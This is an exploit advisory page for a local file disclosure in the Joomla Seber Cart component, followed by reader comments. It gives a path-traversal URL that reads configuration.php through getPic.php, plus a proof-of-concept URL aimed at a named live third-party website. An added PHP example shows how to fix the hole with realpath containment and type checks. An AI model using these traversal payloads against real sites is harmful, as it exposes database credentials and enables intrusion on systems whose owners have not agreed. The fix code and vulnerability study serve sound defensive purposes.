SeberCart LFD Vuln [ readfile() ]


[o] Joomla Component Seber Cart Local File Disclosure Vulnerability


Software : com_sebercart
Vendor : http://www.seber.com.au/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit

http://localhost/[path]/components/com_sebercart/getPic.php?p=../../configuration.php

Download the image.jpg file and open it with Notepad or gedit.
You will see the Joomla configuration there.


[o] PoC

http://www.rare-earth.com.au/components/com_sebercart/getPic.php?p=../../configuration.php
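
One way to close this hole in a getPic.php-style handler, shown as an added example that is not Seber Cart's code or part of the original advisory: the requested name is resolved with realpath() and served only if it stays inside an image directory and really is an image. IMAGE_ROOT, ALLOWED_TYPES, resolve_image_path() and the images/ directory are assumed names and layout.

```php
<?php
// Added example (hypothetical names). The pattern the advisory title points to
// is a request parameter reaching readfile() unchecked, so ?p=../../configuration.php
// is read relative to the component directory and returned to the client.
const IMAGE_ROOT = __DIR__ . '/images';          // assumed image directory
const ALLOWED_TYPES = [
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
];

/** Return [absolute path, MIME type] for a picture, or null to refuse. */
function resolve_image_path(string $requested): ?array
{
    // Empty names and NUL bytes are never valid file names.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $root = realpath(IMAGE_ROOT);
    if ($root === false) {
        return null;
    }
    // realpath() collapses ../ sequences and symlinks; false if the file is missing.
    $real = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment: the resolved path must still start with "<root>/".
    if (strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    // Extension allowlist, then confirm the bytes match the claimed image type.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }
    $info = @getimagesize($real);
    if ($info === false || $info['mime'] !== ALLOWED_TYPES[$ext]) {
        return null;
    }
    return [$real, ALLOWED_TYPES[$ext]];
}

$p   = is_string($_GET['p'] ?? null) ? $_GET['p'] : '';
$hit = resolve_image_path($p);
if ($hit === null) {
    http_response_code(404);   // same answer for "missing" and "outside the root"
    exit;
}
header('Content-Type: ' . $hit[1]);
header('X-Content-Type-Options: nosniff');
readfile($hit[0]);
```

With this check, a request for `../../configuration.php` resolves outside the image directory and gets a 404 instead of the file contents.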

6 Responses so far.

  1. kemud says:

    It doesn't work, bro..... hahaha... can you teach me directly, bro? What's your YM so I can add you..

  2. NoGe says:

    Just join our public IRC channel, okay..

    #evilc0de @ irc.byroe.net

  3. Okay then... but YM if possible, bro. Because I've been learning through this website for a long time, and I don't know (am not acquainted with) the person who made it.....

  4. kemud says:

    Bro, teach me.... I've searched and can't find it, huhuhu.... What's your YM so I can add you later, bro, or an email or something.

  5. NoGe says:

    Whoa.. what are you looking for that you can't find?
    Here's my email.. noge.code@gmail.com

  6. Thank you for sharing with us. The content is very good and helpful for me, I learn and know more about it.